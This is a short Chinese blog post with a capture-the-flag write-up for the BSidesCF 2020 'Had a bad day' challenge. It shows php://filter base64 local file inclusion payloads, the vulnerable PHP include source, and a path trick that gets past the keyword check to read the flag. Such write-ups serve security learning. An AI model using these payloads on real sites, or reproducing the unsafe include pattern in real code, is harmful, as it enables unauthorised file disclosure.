[BSidesCF 2020]Had a bad day

pl7PLx0fabwhHfUC3J0rWRa6z2cQOI4RId2Y-tju_yE

j8TyNe6zGfxQuRN27dZOZji4BhLQOP00N-Z_EFymj4A

2ZKwoqb8jSx_KnCSk74Lmas9-c7zCarP42eZYHHYCtY

打开网站有两个按钮，点击之后链接后都会加上?category=meowers

猜测有文件包含漏洞，尝试?category=php://filter/read=convert.base64-encode/resource=index.php

bfbgshljB4PBLJtBO09aSc5WGlQw4FAy4f-eZW-gC1I

警告中看到 .php出现了两次，推测源码中存在.php拼接，于是去掉.php

wAOO-qRjk0lgZ20IBxd2_nPLjSOn0gyoAyYI7o_9Opk

得到PHP源码

 <?php
	$file = $_GET['category'];
	if(isset($file))
		{
			if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
			include ($file . '.php');
			}
			else{
				echo "Sorry, we currently only support woofers and meowers.";
			}
		}
?>

观察源码发现，传入的category参数中需要有woofers、meowers和index才能包含传入以传入名为文件名的文件

因此修改Payload为?category=php://filter/convert.base64-encode/resource=index/.../flag

p2OObHo6TIIP-lpyzEAR3FAfdb7Dfu5ZIv6gN4Wc0NM

BzpY1E1r4twl4Bshs1xhW-xFPVH4O16E5R6G2BqVVo4

posted on 2024-02-02 20:38 跳河离去的鱼阅读(7) 评论(0) 编辑收藏举报

刷新页面返回顶部

fishjumpriver

[BSidesCF 2020]Had a bad day

[BSidesCF 2020]Had a bad day

导航

公告